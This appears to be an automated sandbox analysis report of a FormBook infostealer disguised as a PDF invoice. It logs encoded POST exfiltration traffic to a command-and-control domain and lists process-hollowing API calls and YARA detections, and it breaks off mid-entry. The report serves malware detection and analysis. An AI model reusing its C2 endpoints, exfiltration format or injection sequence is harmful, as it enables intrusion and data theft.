                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                9 | 192.168.2.4 | 56833 | 52.223.13.41 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:54.982444048 CEST | 767 | OUT | POST /sfpe/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 199
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.resellnexa.shop
                                Origin: http://www.resellnexa.shop
                                Referer: http://www.resellnexa.shop/sfpe/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Ascii: -L=hdJj+Uu8dZ4yx9p5a9Dbfjdl+y33EuIdYrkf1WLKZZD7uZD0D1bbOi3bKkh3xKOhfCbyg/C6PjBQNH+X4+dnB4GE9GUVjmHnAabsHyjkl5NK4yXbsVhZQUgntYuHtv10/K3w1PLJp3ISu+e+UT2nnskgrX8Qf0sADv4bSiJWAoLzPP/GT95CcwT0mMklUxtXOw==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                10 | 192.168.2.4 | 56834 | 52.223.13.41 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:57.529119968 CEST | 787 | OUT | POST /sfpe/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 219
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.resellnexa.shop
                                Origin: http://www.resellnexa.shop
                                Referer: http://www.resellnexa.shop/sfpe/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Ascii: -L=hdJj+Uu8dZ4yxYh5W9/bIzdkii33f+IjYrof1SSVYrn7u4z0C3zbJi3bS0hys6OQfCeBg++6PjlQNGiX4N1kAoGGwmUttGHnAabsHy3Ol5FK7Bfb+HZaTUgk9IuHpv1w/K3o1OX3p1ASu/u+UGWktslrvX9ZWHdWF9BgUwlyIs6SOJucCMYVOw3H7LtRZyQeVzAsqGS3hgLdrFrlUwAuQlc=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                11 | 192.168.2.4 | 56835 | 52.223.13.41 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:07:00.076556921 CEST | 10869 | OUT | POST /sfpe/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 10299
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.resellnexa.shop
                                Origin: http://www.resellnexa.shop
                                Referer: http://www.resellnexa.shop/sfpe/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Ascii: -L= [TRUNCATED]


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                12 | 192.168.2.4 | 56836 | 52.223.13.41 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:07:02.813785076 CEST | 500 | OUT | GET /sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-us
                                Connection: close
                                Host: www.resellnexa.shop
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Oct 2, 2024 02:07:03.289639950 CEST | 398 | IN | HTTP/1.1 200 OK
                                Server: openresty
                                Date: Wed, 02 Oct 2024 00:07:03 GMT
                                Content-Type: text/html
                                Content-Length: 258
                                Connection: close
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov"}</script></head></html>


                                Target ID:0
                                Start time:20:04:58
                                Start date:01/10/2024
                                Path:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
                                Imagebase:0x220000
                                File size:767'488 bytes
                                MD5 hash:7D3EE1A73D9FBEF171C785801FFCAFF2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:2
                                Start time:20:04:59
                                Start date:01/10/2024
                                Path:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
                                Imagebase:0x10000
                                File size:767'488 bytes
                                MD5 hash:7D3EE1A73D9FBEF171C785801FFCAFF2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:20:04:59
                                Start date:01/10/2024
                                Path:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
                                Imagebase:0xf20000
                                File size:767'488 bytes
                                MD5 hash:7D3EE1A73D9FBEF171C785801FFCAFF2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:true

                                Target ID:7
                                Start time:20:05:47
                                Start date:01/10/2024
                                Path:C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe"
                                Imagebase:0xb30000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                Target ID:8
                                Start time:20:05:49
                                Start date:01/10/2024
                                Path:C:\Windows\SysWOW64\RpcPing.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\RpcPing.exe"
                                Imagebase:0x100000
                                File size:26'624 bytes
                                MD5 hash:F7DD5764D96A988F0CF9DD4813751473
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:false

                                Target ID:9
                                Start time:20:06:03
                                Start date:01/10/2024
                                Path:C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe"
                                Imagebase:0xb30000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                Target ID:10
                                Start time:20:06:15
                                Start date:01/10/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff6bf500000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                  Execution Graph

                                  Execution Coverage:9.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:142
                                  Total number of Limit Nodes:12

                                  Control-flow Graph

                                  [Control-flow graph, entry block at d6d03a; graph rendering not recoverable]
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00D6D0BE
                                  • GetCurrentThread.KERNEL32 ref: 00D6D0FB
                                  • GetCurrentProcess.KERNEL32 ref: 00D6D138
                                  • GetCurrentThreadId.KERNEL32 ref: 00D6D191
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 9d5547500c4b44e9a343e7a530ad0edcd58da04e0ed37513767335de987a3b85
                                  • Instruction ID: ff1bcdd55c549c19d283ced6501eb4b122c26868029103b0404cf2a3bec45bd9
                                  • Opcode Fuzzy Hash: 9d5547500c4b44e9a343e7a530ad0edcd58da04e0ed37513767335de987a3b85
                                  • Instruction Fuzzy Hash: B35188B0D003098FDB14DFA9D948B9EBBF2EF49314F248459E409A7350DB78A944CF61

                                  Control-flow Graph

                                  [Control-flow graph, entry block at d6d040; graph rendering not recoverable]
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00D6D0BE
                                  • GetCurrentThread.KERNEL32 ref: 00D6D0FB
                                  • GetCurrentProcess.KERNEL32 ref: 00D6D138
                                  • GetCurrentThreadId.KERNEL32 ref: 00D6D191
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: d0524f09041bfe0d4c16029269e36cc318a310fb3f901e07c6e1f208ceacd394
                                  • Instruction ID: 3dc05885fc6ce8a7f4777b8747a7f363cd9769697298f0ca2a093261ca5e3a30
                                  • Opcode Fuzzy Hash: d0524f09041bfe0d4c16029269e36cc318a310fb3f901e07c6e1f208ceacd394
                                  • Instruction Fuzzy Hash: 9B5178B0D003098FDB14DFA9D948B9EBBF2EF49314F248459E409A7350DB78A944CF65

                                  Control-flow Graph

                                  [Control-flow graph, entry block at 70e4b33; graph rendering not recoverable]
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070E4D6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 0c72676209d25015e044bb71f798691a46d0c8a19db01b064b72c874c4f5b254
                                  • Instruction ID: 8d43d8ddab4f3be600253f60e67df52dc6479a6e3ef0d91f9c5198ff0f85813a
                                  • Opcode Fuzzy Hash: 0c72676209d25015e044bb71f798691a46d0c8a19db01b064b72c874c4f5b254
                                  • Instruction Fuzzy Hash: 5E9169B1D0025ACFDB54CF68C8417EDBBF6BF48314F1486A9E819A7280DB749985CF92

                                  Control-flow Graph

                                  [Control-flow graph, entry block at 70e4b38; graph rendering not recoverable]
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070E4D6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 4a57593aedf952f59a3b909688655d74781a85f7908ca9659676bd8f3c2003cd
                                  • Instruction ID: cf56e693821ac99bdabb806597a596f6fff7c19450f225986bbce61a01b4da5b
                                  • Opcode Fuzzy Hash: 4a57593aedf952f59a3b909688655d74781a85f7908ca9659676bd8f3c2003cd
                                  • Instruction Fuzzy Hash: C1916AB1D0025ACFDB54CF68C8417EDBBF6BF48314F048269E819A7280DB749985CF92

                                  Control-flow Graph

                                  [Control-flow graph, entry block at d6ada8; graph rendering not recoverable]
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00D6AFFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 03533f34220b5948e75432a445bdcd110eb7141b87d202e787b21397c077d172
                                  • Instruction ID: 0e6ffc54326e6172009760ffda9b99375af51d67ce435e22e6483327ef46bf1b
                                  • Opcode Fuzzy Hash: 03533f34220b5948e75432a445bdcd110eb7141b87d202e787b21397c077d172
                                  • Instruction Fuzzy Hash: 577124B0A00B058FD724DF29D44575ABBF1FF88304F04892AE48AE7A41D775E949CFA2

                                  Control-flow Graph

                                  [Control-flow graph, entry block at d644b4; graph rendering not recoverable]
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00D659C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 93575bf558ebe972832c765392fa3d9fc1a7984ea35820a047b66b532c0c0cb1
                                  • Instruction ID: a9832ea9c33fcd54e5cfe48c44f35eb2ac88b81ad439a880ca3d250375158ead
                                  • Opcode Fuzzy Hash: 93575bf558ebe972832c765392fa3d9fc1a7984ea35820a047b66b532c0c0cb1
                                  • Instruction Fuzzy Hash: C041E3B0C0071DCBDB24DFA9C844B9DBBF5BF48304F24815AD509AB255DB75698ACF90

                                  Control-flow Graph

                                  [Control-flow graph, entry block at d6590c; graph rendering not recoverable]
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00D659C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 91b968eb7d06a186ec7a2e7988763cf168fe97cba54886cdcd7d05866e7fdcb2
                                  • Instruction ID: 9775d428820d49eb0c1afc7043f35b3bf49d4b3b8f96a3caf605cd2cfef81356
                                  • Opcode Fuzzy Hash: 91b968eb7d06a186ec7a2e7988763cf168fe97cba54886cdcd7d05866e7fdcb2
                                  • Instruction Fuzzy Hash: 2141DFB0C0071ACBDB24DFA9C8847CDBBB1BF48304F24816AD519AB255DB75698ACF90

                                  Control-flow Graph

                                  [Control-flow graph, entry block at 70e48ab; graph rendering not recoverable]
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070E4940
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 7503b1977b7ad74a27d4eb5b9f04f66c7867b92b0ab7370e73ef4d6e11459bd7
                                  • Instruction ID: ee9f2580a398d7f4ff86f318bdd89f3e22d045f46bc6d7600833c3519cd67905
                                  • Opcode Fuzzy Hash: 7503b1977b7ad74a27d4eb5b9f04f66c7867b92b0ab7370e73ef4d6e11459bd7
                                  • Instruction Fuzzy Hash: 072166B59003499FCF10CFA9C884BEEBBF5FF88310F10842AE959A7240C7789954CBA4

                                  Control-flow Graph

                                  [Control-flow graph, entry block at 70e48b0; graph rendering not recoverable]
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070E4940
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: bbaaf370ed529f4d9fbe9ae6c597b618ad31425568c013d60a98b6ed9bb426d6
                                  • Instruction ID: e1e948c983aaad2b7f894d1468a7c1a4ef552eb4f6117f82250a7a1d9e219337
                                  • Opcode Fuzzy Hash: bbaaf370ed529f4d9fbe9ae6c597b618ad31425568c013d60a98b6ed9bb426d6
                                  • Instruction Fuzzy Hash: E72139B19003599FCF10DFA9C885BDEBBF5FF88310F108429E959A7240C7789954CBA4

                                  Control-flow Graph

                                  [Control-flow graph, entry block at 70e4998; graph rendering not recoverable]
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070E4A20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: e59eecb84c0c33c805820132ac70ff36cc194406d248a87f4f5b46fb8a8f5e64
                                  • Instruction ID: 087596de4424b3173b13dfa9e0647e4fb6a3587041612b6bd5c202666f256fa7
                                  • Opcode Fuzzy Hash: e59eecb84c0c33c805820132ac70ff36cc194406d248a87f4f5b46fb8a8f5e64
                                  • Instruction Fuzzy Hash: 3D2148B1800359DFCB10DFAAC880ADEFBF5FF48320F10842AE519A7240D7389945DBA4

                                  Control-flow Graph

                                  [Control-flow graph, entry block at 70e4713; graph rendering not recoverable]
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070E4796
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: adb07fcce38d8401d28c381505bf0dbdfbc63a12a0ed47b8d1269d712afb2a7c
                                  • Instruction ID: 8f34396f7fdce0e9d1983477200c72943ea776257affff16c940e7b6708703e3
                                  • Opcode Fuzzy Hash: adb07fcce38d8401d28c381505bf0dbdfbc63a12a0ed47b8d1269d712afb2a7c
                                  • Instruction Fuzzy Hash: 2D2137B19003098FDB14DFAAC4857EEBBF4EF89324F10842AE559A7240CB789945CFA5

                                  Control-flow Graph

                                  [Control-flow graph, entry block at 70e4718; graph rendering not recoverable]
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070E4796
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 86be32dcc65a449811b15ff685f1225803c5f8cfcf0b926f91d469dd2359e5cb
                                  • Instruction ID: 901bff603ac86e7babc6dc13bc33b8156216a041b8790e163616141debc53512
                                  • Opcode Fuzzy Hash: 86be32dcc65a449811b15ff685f1225803c5f8cfcf0b926f91d469dd2359e5cb
                                  • Instruction Fuzzy Hash: 882149B1D003098FDB10DFAAC4857EEBBF4EF89324F10842AE559A7241CB789945CFA5
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070E4A20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: ae8fc9e1b296c2d154fcb24b6f177bdd0247de04b7c79e667cea47984f9bb1f5
                                  • Instruction ID: 3214d539df8becac83f33cdec4ae31cbd322d84676a7a4c396af7c8e5dbcf590
                                  • Opcode Fuzzy Hash: ae8fc9e1b296c2d154fcb24b6f177bdd0247de04b7c79e667cea47984f9bb1f5
                                  • Instruction Fuzzy Hash: 442139B1C003499FCB10DFAAC845ADEFBF5FF48320F108429E519A7240D7789944DBA5
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D6D717
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: de80ca95e8a960353541e0cd17f01f1b87427aabb118fe2a4339c75207d4fe70
                                  • Instruction ID: fe02195fb561428a5b3d13b25b0fd396781386d79ad054824e8fb2ae23871200
                                  • Opcode Fuzzy Hash: de80ca95e8a960353541e0cd17f01f1b87427aabb118fe2a4339c75207d4fe70
                                  • Instruction Fuzzy Hash: 6921E4B5D002489FDB10CF9AD984ADEBBF5EB48310F14801AE918A3350C378A954CFA5
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070E485E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 9f40ee2860b77d6576a7f2d02d5d64fceeef4ddfa0e091d40dc51229b597612f
                                  • Instruction ID: a1870dc259d557fa976e135928ccfc56b7645fb745517ab0fac8de95353b6d10
                                  • Opcode Fuzzy Hash: 9f40ee2860b77d6576a7f2d02d5d64fceeef4ddfa0e091d40dc51229b597612f
                                  • Instruction Fuzzy Hash: AC1167B59002898FDB10DFAAC844BEFBFF5EF88324F24841AE519A7250C7359940DFA1
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070E485E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: e68a964213fd862a97bb1afed85ec415932d6422eb181d9354e6072a842318d1
                                  • Instruction ID: 63cee5b802a28f76ac7f199536d76830e804ccc71d6c8c862056846a01e4d806
